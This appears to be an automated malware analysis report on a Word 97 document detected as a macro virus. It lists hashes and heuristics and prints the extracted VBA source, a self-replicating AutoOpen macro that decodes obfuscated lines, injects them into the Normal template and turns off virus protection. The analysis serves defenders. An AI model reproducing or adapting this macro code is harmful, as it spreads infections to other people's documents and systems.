Office (OLE) malware analysis — malicious · d469c83cf2306be3

MALICIOUS

Office (OLE)

68.0 KB Created: 1999-05-27 08:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 64edc1f411fbd145505dabbe86f4732b SHA-1: daf77f3f642dc9f9132879d9fd348ced58839c39 SHA-256: d469c83cf2306be3041d35e0ccf1455c66edd56a0dcb8c84906cda076a7e8b6c

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon opening. The script is obfuscated but appears to be designed to drop and execute a payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Noswan-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Noswan-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15980 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15980 bytes
SHA-256: `90c0a8568c26a0a678f482314770c92510e0ab31879d6bf44e82e681dddcb9ae`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub ForsakenRun() Forsaken End Sub Attribute VB_Name = "Idee" ' ========================= ' W97M.Forsaken ][ ' ' Unaufindbar von F/Win32 ' Versteckt Code in Arrays ' PolyMorphicEngine SPE ' ========================= Public CodeContainer As Object Public Runner As Object Sub AutoOpen() 'On Error Resume Next If MacroContainer = NormalTemplate Then Set CodeContainer = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set Runner = Normal.ThisDocument Else Set CodeContainer = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set Runner = Project.ThisDocument End If 'CodeContainer.AddFromString ("Sub ForsakenRun()" & vbCr & "Forsaken" & vbCr & "End Sub") Drop End Sub Sub Drop() 'On Error Resume Next Dim V$(40) V$(1) = "p’ =cŒ��~ˆ‚‹EF" V$(2) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘" V$(3) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚" V$(4) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚" V$(5) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚" V$(6) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚" V$(7) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�E?p–Š Œ‰‰‚†�‘‚‹?FKb‹~ ‰‚�=Z=c~‰�‚" V$(8) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�E?cŒ�Š~‘“Œ�‰~„‚KKK?FKb‹~ ‰‚�=Z=c~‰�‚" V$(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?j~ˆ�Œ?FKb‹~ ‰‚�=Z=c~‰�‚" V$(10) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?sŒ�‰~„‚‹=’‹�=^��Jf‹�KKK?FKb‹~ ‰‚�=Z=c~‰�‚" V$(11) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?^‹�~��‚‹KKK?FKb‹~ ‰‚�=Z=c~‰�‚" V$(12) = "p‚‘=^€=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�" V$(13) = "p‚‘=kŒ=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�" V$(14) = "^€j=Z=`…�ETPF=H=`…�ENMMF=H=`…�ENMNF=H=`…�ENMNF" V$(15) = "a~‘~=Z=?€Wy”†‹K�–�?" V$(16) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�E^€jFKb•�Œ�‘=a~‘~" V$(17) = "^€f‹�=Z=c~‰�‚" V$(18) = "kŒf‹�=Z=c~‰�‚" V$(19) = "cŒ�=†=Z=N=qŒ=kŒK`Œ’‹‘" V$(20) = "fƒ=kŒE†FKk~Š‚=Z=^€j=q…‚‹=kŒf‹�=Z=q�’‚" V$(21) = "k‚•‘" V$(22) = "cŒ�=†=Z=N=qŒ=^€K`Œ’‹‘" V$(23) = "fƒ=^€E†FKk~Š‚=Z=^€j=q…‚‹=^€f‹�=Z=q�’‚" V$(24) = "k‚•‘" V$(25) = "fƒ=kŒf‹�=Z=c~‰�‚=q…‚‹" V$(26) = "kŒKfŠ�Œ�‘=a~‘~" V$(27) = "b‹�=fƒ" V$(28) = "fƒ=^€f‹�=Z=c~‰�‚=q…‚‹" V$(29) = "^€KfŠ�Œ�‘=a~‘~" V$(30) = "b‹�=fƒ" V$(31) = "fƒ=a~–EkŒ”EFF=Z=f‹‘Eo‹�=G=PMF=H=N=q…‚‹" V$(32) = "====t†‘…=^��†�‘~‹‘Kk‚”_~‰‰ŒŒ‹" V$(33) = "========K^‹†Š~‘†Œ‹=Z=Š�Œ^‹†Š~‘†Œ‹d‚‘^�‘�–" V$(34) = "========Ke‚~�†‹„=Z=?tVTjKcŒ��~ˆ‚‹=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li—Œ=s•?" V$(35) = "========Kf€Œ‹=Z=Š�Œf€Œ‹^‰‚�‘" V$(36) = "========Kq‚•‘=Z=?fƒ=–Œ’=�‚~�=‘…†�I=–Œ’=~�‚=†‹ƒ‚€‘‚�>?" V$(37) = "========Kp…Œ”" V$(38) = "====b‹�=t†‘…" V$(39) = "b‹�=fƒ" V$(40) = "b‹�=p’ " Application.ScreenUpdating = False For i = 1 To 40 For j = 1 To Len(V$(i)) y = Asc(Mid$(V$(i), j, 1)) z = y - 29 If z < 0 Then z = z + 255 x$ = x$ & Chr(c) Next j x$ = x$ & vbCr Next xl = CodeContainer.CountOfLines CodeContainer.InsertLines (xl + 1), x$ If Runner = Normal.ThisDocument Then NormalTemplate.Save Else ActiveDocument.SaveAs ActiveDocument.FullName End If 'Runner.ForsakenRun 'xl = CodeContainer.CountOfLines 'For i = 1 To xl 'CodeContainer.Deletelines 1 'Next 'PolySize = Int(Rnd * 10) 'For PolyMorphic = 1 To PolySize 'PolyString = "" 'PolyLines = Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.CountOfLines 'RndLine = Int(Rnd * PolyLines) 'StringSize = Int(Rnd * 39) + 1 'For SomeString = 1 To StringSize ' PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) 'Next SomeString 'Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.InsertLines RndLine, "Rem " & PolyString 'Next PolyMorphic If ActiveDocument.Saved = False Then _ ActiveDocument.SaveAs ActiveDocument.FullName Application.ScreenUpdating = True End Sub ' Jack Twoflower/LineZerØ Vx Team ' Thanks to: ' ========== ' Night ... (truncated)

SHA-256: 90c0a8568c26a0a678f482314770c92510e0ab31879d6bf44e82e681dddcb9ae

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ForsakenRun()
Forsaken
End Sub




Attribute VB_Name = "Idee"
    ' =========================
    '  W97M.Forsaken ][
    '
    '  Unaufindbar von F/Win32
    '  Versteckt Code in Arrays
    '  PolyMorphicEngine SPE
    ' =========================

Public CodeContainer As Object
Public Runner As Object
Sub AutoOpen()
'On Error Resume Next
If MacroContainer = NormalTemplate Then
Set CodeContainer = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Normal.ThisDocument
Else
Set CodeContainer = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set Runner = Project.ThisDocument
End If
'CodeContainer.AddFromString ("Sub ForsakenRun()" & vbCr & "Forsaken" & vbCr & "End Sub")
Drop
End Sub
Sub Drop()
'On Error Resume Next
Dim V$(40)

V$(1) = "p’ =cŒ��~ˆ‚‹EF"
V$(2) = "l‹=b��Œ�=o‚�’Š‚=k‚•‘"
V$(3) = "l�‘†Œ‹�Ks†�’�m�Œ‘‚€‘†Œ‹=Z=c~‰�‚"
V$(4) = "l�‘†Œ‹�Kp~“‚kŒ�Š~‰m�ŒŠ�‘=Z=c~‰�‚"
V$(5) = "l�‘†Œ‹�K^‰‰Œ”c~�‘p~“‚=Z=c~‰�‚"
V$(6) = "^��‰†€~‘†Œ‹Ka†��‰~–^‰‚�‘�=Z=”�^‰‚�‘�kŒ‹‚"
V$(7) = "`ŒŠŠ~‹�_~��E?s†‚”?FK`Œ‹‘�Œ‰�E?p–Š Œ‰‰‚†�‘‚‹?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(8) = "`ŒŠŠ~‹�_~��E?cŒ�Š~‘?FK`Œ‹‘�Œ‰�E?cŒ�Š~‘“Œ�‰~„‚KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(9) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?j~ˆ�Œ?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(10) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?sŒ�‰~„‚‹=’‹�=^��Jf‹�KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(11) = "`ŒŠŠ~‹�_~��E?qŒŒ‰�?FK`Œ‹‘�Œ‰�E?^‹�~��‚‹KKK?FKb‹~ ‰‚�=Z=c~‰�‚"
V$(12) = "p‚‘=^€=Z=^€‘†“‚aŒ€’Š‚‹‘Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(13) = "p‚‘=kŒ=Z=kŒ�Š~‰q‚Š�‰~‘‚Ks_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�"
V$(14) = "^€j=Z=`…�ETPF=H=`…�ENMMF=H=`…�ENMNF=H=`…�ENMNF"
V$(15) = "a~‘~=Z=?€Wy”†‹K�–�?"
V$(16) = "^��‰†€~‘†Œ‹Ks_bK^€‘†“‚s_m�Œ‡‚€‘Ks_`ŒŠ�Œ‹‚‹‘�E^€jFKb•�Œ�‘=a~‘~"
V$(17) = "^€f‹�=Z=c~‰�‚"
V$(18) = "kŒf‹�=Z=c~‰�‚"
V$(19) = "cŒ�=†=Z=N=qŒ=kŒK`Œ’‹‘"
V$(20) = "fƒ=kŒE†FKk~Š‚=Z=^€j=q…‚‹=kŒf‹�=Z=q�’‚"
V$(21) = "k‚•‘"
V$(22) = "cŒ�=†=Z=N=qŒ=^€K`Œ’‹‘"
V$(23) = "fƒ=^€E†FKk~Š‚=Z=^€j=q…‚‹=^€f‹�=Z=q�’‚"
V$(24) = "k‚•‘"
V$(25) = "fƒ=kŒf‹�=Z=c~‰�‚=q…‚‹"
V$(26) = "kŒKfŠ�Œ�‘=a~‘~"
V$(27) = "b‹�=fƒ"
V$(28) = "fƒ=^€f‹�=Z=c~‰�‚=q…‚‹"
V$(29) = "^€KfŠ�Œ�‘=a~‘~"
V$(30) = "b‹�=fƒ"
V$(31) = "fƒ=a~–EkŒ”EFF=Z=f‹‘Eo‹�=G=PMF=H=N=q…‚‹"
V$(32) = "====t†‘…=^��†�‘~‹‘Kk‚”_~‰‰ŒŒ‹"
V$(33) = "========K^‹†Š~‘†Œ‹=Z=Š�Œ^‹†Š~‘†Œ‹d‚‘^�‘�–"
V$(34) = "========Ke‚~�†‹„=Z=?tVTjKcŒ��~ˆ‚‹=™= –=g~€ˆ=q”Œƒ‰Œ”‚�Li—Œ=s•?"
V$(35) = "========Kf€Œ‹=Z=Š�Œf€Œ‹^‰‚�‘"
V$(36) = "========Kq‚•‘=Z=?fƒ=–Œ’=�‚~�=‘…†�I=–Œ’=~�‚=†‹ƒ‚€‘‚�>?"
V$(37) = "========Kp…Œ”"
V$(38) = "====b‹�=t†‘…"
V$(39) = "b‹�=fƒ"
V$(40) = "b‹�=p’ "

Application.ScreenUpdating = False

For i = 1 To 40
    
    For j = 1 To Len(V$(i))
        y = Asc(Mid$(V$(i), j, 1))
        z = y - 29
        If z < 0 Then z = z + 255
     
        x$ = x$ & Chr(c)
    Next j
    x$ = x$ & vbCr
Next

xl = CodeContainer.CountOfLines

CodeContainer.InsertLines (xl + 1), x$

If Runner = Normal.ThisDocument Then
NormalTemplate.Save
Else
ActiveDocument.SaveAs ActiveDocument.FullName
End If

'Runner.ForsakenRun

'xl = CodeContainer.CountOfLines

'For i = 1 To xl
'CodeContainer.Deletelines 1
'Next

'PolySize = Int(Rnd * 10)

'For PolyMorphic = 1 To PolySize

    'PolyString = ""
    'PolyLines = Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.CountOfLines

    'RndLine = Int(Rnd * PolyLines)
    'StringSize = Int(Rnd * 39) + 1

    'For SomeString = 1 To StringSize
    '    PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
    'Next SomeString
    
    'Application.VBE.ActiveVBProject.VBComponents("Idee").CodeModule.InsertLines RndLine, "Rem " & PolyString

'Next PolyMorphic

If ActiveDocument.Saved = False Then _
ActiveDocument.SaveAs ActiveDocument.FullName
Application.ScreenUpdating = True
End Sub
' Jack Twoflower/LineZerØ Vx Team

' Thanks to:
' ==========
' Night
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.